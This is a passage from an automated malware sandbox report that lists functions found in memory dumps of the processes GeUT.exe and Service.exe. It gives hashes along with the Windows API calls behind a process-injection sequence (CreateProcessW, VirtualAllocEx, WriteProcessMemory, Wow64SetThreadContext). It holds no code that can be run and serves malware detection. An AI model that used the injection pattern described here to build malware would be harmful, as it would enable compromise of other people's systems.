Instruction ID: 6bcf9aeedb3db39adfd5af42e30dae8133a7abb19b144b3eb41d38609747b146
Opcode Fuzzy Hash: e643d4795eca22c6ecf705c8129193cc6ce84075686816cf3e728711d095112e
Instruction Fuzzy Hash: 64917D307002468FDB14EF78E958A6E7FA6FBC4600B00493DD546DB3A9DF789C098B81

Function 03061157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148687dc883adda58e819f9110873eff351cc8b0826917e2a8ba0bce8ba05749
Instruction ID: d68cea5166935727dac850ede32984fe4dcb6dd965025020141f214f33bee52a
Opcode Fuzzy Hash: 148687dc883adda58e819f9110873eff351cc8b0826917e2a8ba0bce8ba05749
Instruction Fuzzy Hash: 1231AD71B01B418BDA69EB79C81812E7EEABFC4211300893DC55BCB798DF749D048BC2

Function 03061860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb609ecd7efe7ddc230b97ec6d0e07e789c8b4b7e5f3191c270ab4784f2e4f56
Instruction ID: cdbe118b58323a043ed379beaad5c5729307c8cb3a6279aaaa4422f158e0db74
Opcode Fuzzy Hash: bb609ecd7efe7ddc230b97ec6d0e07e789c8b4b7e5f3191c270ab4784f2e4f56
Instruction Fuzzy Hash: C02190B1B012459BDB44ABFA881836FBEEEEFD8210B14842ED54BD7355DE348C0547A2

Function 03061740 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 410c8291a15334b2e74fc1283f7f425ff94b3112e3ff4a79719e65a97697353f
Instruction ID: 8adc4be6435c2d9012889693e5942066f5234a89c6feacb18f83741a95e334df
Opcode Fuzzy Hash: 410c8291a15334b2e74fc1283f7f425ff94b3112e3ff4a79719e65a97697353f
Instruction Fuzzy Hash: 4831187090020ADFDB44EFB8D9546AEBBB2EF84300F20867DD505BB355EB796A50CB51

Function 03060939 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad16dfc4553c0e1dac66c53e695fb8efa7384e0cd67c302f4f0fed251c1dbb0
Instruction ID: 4b42ed4f26a65cfe0ebd70ed4750a8404ba48479fd0e59487112cf274c1dff13
Opcode Fuzzy Hash: 1ad16dfc4553c0e1dac66c53e695fb8efa7384e0cd67c302f4f0fed251c1dbb0
Instruction Fuzzy Hash: 56217C30E452088FDB94EBB8D8556AE7BF6EF84204F1480AAC40AEB259DB308D05CB91

Function 03061750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65584e95bf4bcdf08d94ec1bf65765d4f8becfc75aa1c0069eb6b25bdc821719
Instruction ID: e325c3970d185739b64a5de4e4eb09d819aef650e833efc975eb434a2e9996c2
Opcode Fuzzy Hash: 65584e95bf4bcdf08d94ec1bf65765d4f8becfc75aa1c0069eb6b25bdc821719
Instruction Fuzzy Hash: A2212370A0020ADFDB04EFB8D954AADBBB6EF88200F10866DD505A7355EB796A50CB51

Function 03060848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e51061a0fa4ec7a810667dc15ede5666d6b2a265bcba51b7c802aa376e36c40
Instruction ID: 107e3a9fe2c2378214ae2f3460e4634af17ed212e5c4f6983554027a66c81724
Opcode Fuzzy Hash: 5e51061a0fa4ec7a810667dc15ede5666d6b2a265bcba51b7c802aa376e36c40
Instruction Fuzzy Hash: 8B117770111206DFDB05EF28FB90A557BA5F7C4704B00A6BC9984BB225EBBD6D099F81

Analysis Process: GeUT.exePID: 5004, Parent PID: 1320COMMON

Executed Functions

Function 012F0D95 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f182899094e6a4a859b5041473df51eb640c2b836c94055c997e37206a6293
Instruction ID: 9f4367c0df33a342cbf86ede97d4e0cec8a9e83fc5ae27adb0d0ab03b2c61ec2
Opcode Fuzzy Hash: b9f182899094e6a4a859b5041473df51eb640c2b836c94055c997e37206a6293
Instruction Fuzzy Hash: 3E513775610246CFDB5ABB78F85C52E7FB6FB843047109A2CD1168B3A9EF749C058B80

Function 012F1010 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cecdb07f1c7de7402c0d9babea0805dcdba44b5f85d496f5b0732cae89fb9784
Instruction ID: 3819be7102f762a36d1617223cd304a9a1b70043602e658fe18e75c430d10ef8
Opcode Fuzzy Hash: cecdb07f1c7de7402c0d9babea0805dcdba44b5f85d496f5b0732cae89fb9784
Instruction Fuzzy Hash: D0915E357102468FDB55EB78E858A2E7FB6FF88304B10856DE116DB3A9DF749C058B80

Function 012F1157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94327490822b6f0e57323aac9dabd0644697c8bfa02f08e77ebf7dc361a561d6
Instruction ID: e4370c29591f240db46c7fabecf683524a50f874f14552c26e4c270a7b57f993
Opcode Fuzzy Hash: 94327490822b6f0e57323aac9dabd0644697c8bfa02f08e77ebf7dc361a561d6
Instruction Fuzzy Hash: AF31AD31B10B468BDB69AB79A81812EBAE2BFC4214700893DD257CB794DF749C048BC1

Function 012F1860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aab138418822d26f0090abb0e1594f4d62e704dc7d325377b6616d68cb8688b9
Instruction ID: a28a4ce51bbf943dd65ea6b1e47b163f8e382f0aa753d520c28d990e6c0a777f
Opcode Fuzzy Hash: aab138418822d26f0090abb0e1594f4d62e704dc7d325377b6616d68cb8688b9
Instruction Fuzzy Hash: E6218171B002099BDB44EBF9985826EBAEBEFC8340B14842DDA4AD7346DE744C0147A1

Function 012F1740 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4f7071f2978ce0863359c4655e045b18c428ad2e9cf5c67abd6deed412f4dc
Instruction ID: d03ba497d375eb6a5d4ef6a107c45c4168b9817a25d4e68af04949e3cd3a694c
Opcode Fuzzy Hash: aa4f7071f2978ce0863359c4655e045b18c428ad2e9cf5c67abd6deed412f4dc
Instruction Fuzzy Hash: D2313875D0020ADFDB45FBB8E8546AEBFB2EB84300F10866DD505AB395EB706A40CF50

Function 012F1750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ed0a747401cca993179c5ac74e3db8d785e2a53812028b735585b6fecf3c6a
Instruction ID: 8955527f6864edcf77f41e506e35ca85fc992b44939072f7aecad5f7ad8dca59
Opcode Fuzzy Hash: 24ed0a747401cca993179c5ac74e3db8d785e2a53812028b735585b6fecf3c6a
Instruction Fuzzy Hash: CF211775A0020ADFDB45FBB8E8946AEBFB6FB84300F10866DD505AB355EB706A40CF51

Function 012F0939 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8099c28e43c9cc40707292960eaf604d4c96c049b33e0292d3a5bade0366513c
Instruction ID: 2a1ad91736bc1edbed1de7a26903bc5ff9fbc9371d9f171931b32b6f50420fcb
Opcode Fuzzy Hash: 8099c28e43c9cc40707292960eaf604d4c96c049b33e0292d3a5bade0366513c
Instruction Fuzzy Hash: 78218E30F15245CFCB45EBB8D8646AEBFF2AF85200F1481A9D6459B295DB304D05CB81

Function 012F0828 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47b79eb3aad5d34d7e8a8da023c0fe7bd2c8fb6a5fdccbbe7732bda493362e23
Instruction ID: e117290f842928cdc53cef4da93d39474460b626f62106cc516a2bb31bf4a390
Opcode Fuzzy Hash: 47b79eb3aad5d34d7e8a8da023c0fe7bd2c8fb6a5fdccbbe7732bda493362e23
Instruction Fuzzy Hash: 1E21CD36501246DFDB06FF28F890A657FB9FB81304B009A5DD1149F36ADAB46949CF80

Function 012F0848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2451424821.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12f0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e732f2df1fee8a3128e7182bb51e664cbbdabff6fc186a89d81defc12a27c8d0
Instruction ID: 532eaa44f7745054126aaea02de36eb70d7c2d6df5a09cf0aaca722fd3bb2ed2
Opcode Fuzzy Hash: e732f2df1fee8a3128e7182bb51e664cbbdabff6fc186a89d81defc12a27c8d0
Instruction Fuzzy Hash: 21118C3690124BDFDB06FF18F984A657FB9F784304B40AA5CD1149F36DDAB469098F80

Analysis Process: Service.exePID: 2940, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	30.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	2

Executed Functions

Function 00B94E34 Relevance: 1.7, APIs: 1, Instructions: 224
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B95011

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d4207da47e494680f44fb18b8c4e4e13f2a8724ad0c5aa7d9eab045c1f014e05
Instruction ID: 266280968202a14b4d70eaf0f2c806cfd2d2bc1d1fc6c38eaf8bf932331248c2
Opcode Fuzzy Hash: d4207da47e494680f44fb18b8c4e4e13f2a8724ad0c5aa7d9eab045c1f014e05
Instruction Fuzzy Hash: 5A81AF75D00269DFDF21CFA9C940BEEBBF5AB49300F1091AAE508B7261DB709A85CF54

Function 00B91B9C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B91D79

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4e671b4da6f8a8534882196c94d14a0937e0cbb589df4a3396b32d8f7a04cb42
Instruction ID: e7519c3e80cdf21854b773d0a5e39e0bd3db12de5c9f204142143157030c0f5e
Opcode Fuzzy Hash: 4e671b4da6f8a8534882196c94d14a0937e0cbb589df4a3396b32d8f7a04cb42
Instruction Fuzzy Hash: 7D81B174C00229DFDF21CFA9C940BEDBBF5AB49300F1095AAE509B7260DB709A89DF54

Function 00B97CDC Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B97EB9

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 615878f58f343d4eeb1eed7fdf2e9bf22d831d37421700f4ba875a88a41b05eb
Instruction ID: 04cbb0071ebf5c414fe929d548717c7e0a5d5c63abd7009adaae53e8cd627654
Opcode Fuzzy Hash: 615878f58f343d4eeb1eed7fdf2e9bf22d831d37421700f4ba875a88a41b05eb
Instruction Fuzzy Hash: E981BF75C00269DFDF21CFA9C984BEDBBF5AB49300F1091AAE508B7260DB709A85CF54

Function 00B95C6C Relevance: 1.7, APIs: 1, Instructions: 222
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B95E49

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8b1b67d91685686648baecfa2b0790c14c38a5192bef49cb5ced18c3cd5ae416
Instruction ID: e5d3b26a6a29b9fe5b78829df01951ec9ddf2ab5e1bc050834f35634acdb30f8
Opcode Fuzzy Hash: 8b1b67d91685686648baecfa2b0790c14c38a5192bef49cb5ced18c3cd5ae416
Instruction Fuzzy Hash: 8881BF75C00229DFDF21DFA9C940BEDBBF5AB09300F1091AAE508B7260DB709A85CF54

Function 00B96EA4 Relevance: 1.7, APIs: 1, Instructions: 222
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B97081

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 57216efc940989321227477676fc5ac4c74f63e89e8edb27bbce27ec273d173a
Instruction ID: d671c8a56dbb34661e2e4a67829708cd79d8ee3d37b00aa80db529a4cb9e6d61
Opcode Fuzzy Hash: 57216efc940989321227477676fc5ac4c74f63e89e8edb27bbce27ec273d173a
Instruction Fuzzy Hash: 2C81BF75C00269CFDF25CFA9D980BEDBBF5AB09300F1091AAE508B7260DB709A85CF54

Function 00B91BA8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B91D79

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0a8ad7ff16c1802b6a3e7670eaeca0eaf5f9d75561eefcefb8edc9f6741bb704
Instruction ID: e5c1b88afdf6787b3918847fec9951344d05ed18c94f5ccd7a6edc020ceec271
Opcode Fuzzy Hash: 0a8ad7ff16c1802b6a3e7670eaeca0eaf5f9d75561eefcefb8edc9f6741bb704
Instruction Fuzzy Hash: 3481B174C00269DFDF21CFA9C940BEDBBF5AB49300F1095AAE509B7260DB709A89DF54

Function 00B97CE8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B97EB9

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c3b3af7763df9d5fea8dbd64f850b498e9c98cc6839bcf24d14d554fce470a9
Instruction ID: 5ad8eeedb3e1b2f2c1d6a0248e612bd9574f02f78bd9006eade1bd042be3bea5
Opcode Fuzzy Hash: 0c3b3af7763df9d5fea8dbd64f850b498e9c98cc6839bcf24d14d554fce470a9
Instruction Fuzzy Hash: 1081AE75C00269CFDF21CFA9C984BEDBBF5AB49304F1091AAE508B7260DB709A85CF54

Function 00B95C78 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B95E49

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cdaf73943da121f35e521f275559c940ab94918a495c16cc7310265a45a8454c
Instruction ID: 390048bdf804179721c538925559f1466d0e74ffec4041b9c1d96e2ebfb167d4
Opcode Fuzzy Hash: cdaf73943da121f35e521f275559c940ab94918a495c16cc7310265a45a8454c
Instruction Fuzzy Hash: E981AE75C00269DFDF21DFA9C944BEEBBF5AB49300F1091AAE508B7260DB709A85CF54

Function 00B96EB0 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B97081

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1614f85cb47e40e8c1e329f067fbc0bd9db2d00eeb1edc49727e07f0ebfe50b7
Instruction ID: b102be2c858ab095a9fd4b103cd1d7329e5977db8762ddd7c9ab9882a7186231
Opcode Fuzzy Hash: 1614f85cb47e40e8c1e329f067fbc0bd9db2d00eeb1edc49727e07f0ebfe50b7
Instruction Fuzzy Hash: 0A81AF74C00269CFDF25CFA9D980BEDBBF5AB49300F1091AAE508B7261DB709A85CF54

Function 00B94E40 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B95011

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 308521af254cdfa4f82a832128361b19ba2888a570a1c6d680ab6074ec131cf6
Instruction ID: a326d99ade080bda8d72fa5662acd9b40c16e990c4d13e1357f76007fcba594f
Opcode Fuzzy Hash: 308521af254cdfa4f82a832128361b19ba2888a570a1c6d680ab6074ec131cf6
Instruction Fuzzy Hash: 0A81AF75C00269DFDF21CFA9C940BEEBBF5AB49300F1091AAE508B7261DB709A85CF54

Function 00B921F0 Relevance: 1.6, APIs: 1, Instructions: 111
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B922C6

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2ec193b2a401cf24303f04e4251d3d182c6b74d2f5cb6ce121d42b0662cbbf76
Instruction ID: d4301e80b033aba0f2b57738432d3d924190148fe6c7e4daf9c9e2b67b4e1810
Opcode Fuzzy Hash: 2ec193b2a401cf24303f04e4251d3d182c6b74d2f5cb6ce121d42b0662cbbf76
Instruction Fuzzy Hash: 5E4178B5D042589FCF00CFA9D984ADEFBF1BB49310F24906AE818B7250D374AA45CB64

Function 00B921F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B922C6

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 305bde68640a8bf33abd48f78e0e4902fac99c9d368cc54520bba1d936dcb5ae
Instruction ID: 2fdb95f330fe3a86e3e3cdd9705fade90c6024fe330091080cd996f442d1edf9
Opcode Fuzzy Hash: 305bde68640a8bf33abd48f78e0e4902fac99c9d368cc54520bba1d936dcb5ae
Instruction Fuzzy Hash: 9B4167B5D042589FCF00CFA9D984ADEFBF1BB49310F24906AE918B7210D375AA45CF64

Function 00B91FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B92085

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 93c41dde47b90d3846ff3b5d66014e81abd674be19094bdcc1f085ae7f71975f
Instruction ID: 3096a283ac9220dc608592358009b659d43787936ec691d55431b07f33f17d0d
Opcode Fuzzy Hash: 93c41dde47b90d3846ff3b5d66014e81abd674be19094bdcc1f085ae7f71975f
Instruction Fuzzy Hash: D33167B9D042589FCF10CFAAD984ADEFBB5BB19310F20A06AE914B7210D375A945CF64

Function 00B91FD0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00B92085

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 14d7671640a2b683e7a17fd83fa5839ba4a702de7f6db386ea111e4c452ca951
Instruction ID: 723bd99d4e89c4860be57fd4a98537927ee9f1ff9b382fa81a80986a0afdb0f4
Opcode Fuzzy Hash: 14d7671640a2b683e7a17fd83fa5839ba4a702de7f6db386ea111e4c452ca951
Instruction Fuzzy Hash: A03169B9D04258DFCF10CFA9D584ADEFBB1BB19310F14A06AE814B7210D375A945CF65

Function 00B920E8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B92195

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ca2d9a22177c2552236838e1cba11b594e90551b64c3a7cefe5283bf12863f0b
Instruction ID: 5c8f075c7bc571f5558963eea474e5fb155ff9ce81bb77ab19af0bb2ee4e0ed9
Opcode Fuzzy Hash: ca2d9a22177c2552236838e1cba11b594e90551b64c3a7cefe5283bf12863f0b
Instruction Fuzzy Hash: 693167B9D04258DFCF10CFA9D984A9EFBB1BB09310F20A06AE918B7310D375A955CF64

Function 00B920F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B92195

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b2a1b140b61afb6287e56bde3d034834647b154b142bdd3efa32b83053cd6b71
Instruction ID: ba1c7461fc8a74c366dd0c8c60daee354e37b484eeb066d9cc934e25e319d15d
Opcode Fuzzy Hash: b2a1b140b61afb6287e56bde3d034834647b154b142bdd3efa32b83053cd6b71
Instruction Fuzzy Hash: 3F3176B9D04258DFCF10CFA9D980A9EFBB5BB09310F20A02AE914B7310D375A955CF64

Function 00B91EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00B91F72

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 723a873b07a661a5fd5ee48b3a733f1c2497d1c22a993f592097a8f4258fa82f
Instruction ID: 2a3f17dec4e532eec500de8e4b5eae3772f7f4c6e9722b95cf7892bec44e35ef
Opcode Fuzzy Hash: 723a873b07a661a5fd5ee48b3a733f1c2497d1c22a993f592097a8f4258fa82f
Instruction Fuzzy Hash: 4A31A7B5D012599FCF10CFAAD984ADEFBF1BB49310F24906AE418B7210D378AA45CF64

Function 00B91EC1 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00B91F72

Memory Dump Source

Source File: 00000018.00000002.2500718266.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_b90000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cff3256580277cf5b04a1de5576dcd284a08b32d56e6a722585e759840622ff3
Instruction ID: 4b1940544373c2dbeb783ded0d79c5234cc3fa138cdd29b9d67953cdaea4b366
Opcode Fuzzy Hash: cff3256580277cf5b04a1de5576dcd284a08b32d56e6a722585e759840622ff3
Instruction Fuzzy Hash: 2E31C7B5D012599FCF10CFAAD984ADEFBF1BB49314F24806AE418B7250D378AA45CF64

